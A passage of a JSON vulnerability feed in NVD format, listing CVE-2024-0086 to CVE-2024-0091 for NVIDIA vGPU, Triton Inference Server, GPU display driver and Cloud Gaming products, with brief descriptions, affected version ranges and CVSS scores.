"cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:canonical:ubuntu_linux:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:citrix:hypervisor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:*:*:*:*:*:*:*:*", "versionEndExcluding" : "555.52.04", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:microsoft:azure_stack_hci:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0086", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-476" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA vGPU software for Linux contains a vulnerability where the software can dereference a NULL pointer. A successful exploit of this vulnerability might lead to denial of service and undefined behavior in the vGPU plugin." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "13.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "14.0", "versionEndExcluding" : "16.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.0", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:canonical:ubuntu_linux:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:citrix:hypervisor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:*:*:*:*:*:*:*:*", "versionEndExcluding" : "555.52.04", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0087", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Triton Inference Server for Linux contains a vulnerability where a user can set the logging location to an arbitrary file. If this file exists, logs are appended to the file. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-14T14:39Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0088", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "refsource" : "", "tags" : [ ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5535", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA Triton Inference Server for Linux contains a vulnerability in shared memory APIs, where a user can cause an improper memory access issue by a network API. A successful exploit of this vulnerability might lead to denial of service and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-14T14:39Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0089", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-665" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows contains a vulnerability where the information from a previous client or another process could be disclosed. A successful exploit of this vulnerability might lead to code execution, information disclosure, or data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "470", "versionEndExcluding" : "475.06", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "535", "versionEndExcluding" : "538.67", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "550", "versionEndExcluding" : "552.55", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "555", "versionEndExcluding" : "555.99", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:geforce:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:nvs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:quadro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:rtx:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:studio:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:tesla:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "13.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "14.0", "versionEndExcluding" : "16.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.0", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:*:*:*:*:*:*:*:*", "versionEndExcluding" : "555.99", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0090", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU driver for Windows and Linux contains a vulnerability where a user can cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "470", "versionEndExcluding" : "475.06", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "535", "versionEndExcluding" : "538.67", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "550", "versionEndExcluding" : "552.55", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "555", "versionEndExcluding" : "555.99", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:geforce:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:nvs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:quadro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:rtx:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:studio:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:tesla:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:linux:*:*", "versionStartIncluding" : "470", "versionEndExcluding" : "470.256.02", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:linux:*:*", "versionStartIncluding" : "535", "versionEndExcluding" : "535.180.01", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:linux:*:*", "versionStartIncluding" : "550", "versionEndExcluding" : "550.90.07", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:linux:*:*", "versionStartIncluding" : "555", "versionEndExcluding" : "555.52.04", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:geforce:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:nvs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:quadro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:rtx:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:tesla:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "13.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "14.0", "versionEndExcluding" : "16.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.0", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:canonical:ubuntu_linux:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:citrix:hypervisor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:*:*:*:*:*:*:*:*", "versionEndExcluding" : "555.99", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:*:*:*:*:*:*:*:*", "versionEndExcluding" : "555.52.04", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:microsoft:azure_stack_hci:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-06-13T22:15Z", "lastModifiedDate" : "2024-11-21T08:45Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0091", "ASSIGNER" : "psirt@nvidia.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-Other" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "name" : "https://nvidia.custhelp.com/app/answers/detail/a_id/5551", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability where a user can cause an untrusted pointer dereference by executing a driver API. A successful exploit of this vulnerability might lead to denial of service, information disclosure, and data tampering." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "550", "versionEndExcluding" : "552.55", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:windows:*:*", "versionStartIncluding" : "555", "versionEndExcluding" : "555.99", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:geforce:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:nvs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:quadro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:rtx:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:studio:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:tesla:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:linux:*:*", "versionStartIncluding" : "550", "versionEndExcluding" : "550.90.07", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:gpu_display_driver:*:*:*:*:*:linux:*:*", "versionStartIncluding" : "555", "versionEndExcluding" : "555.52.04", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:geforce:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:nvs:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:quadro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:rtx:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:nvidia:tesla:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "13.11", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "14.0", "versionEndExcluding" : "16.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionStartIncluding" : "17.0", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:canonical:ubuntu_linux:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:citrix:hypervisor:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:*:*:*:*:*:*:*:*", "versionEndExcluding" : "555.99", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:cloud_gaming:*:*:*:*:*:*:*:*", "versionEndExcluding" : "555.52.04", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:redhat:enterprise_linux_kernel-based_virtual_machine:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:vmware:vsphere:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:nvidia:virtual_gpu:*:*:*:*:*:*:*:*", "versionEndExcluding" : "17.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:a:microsoft:azure_stack_hci:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", 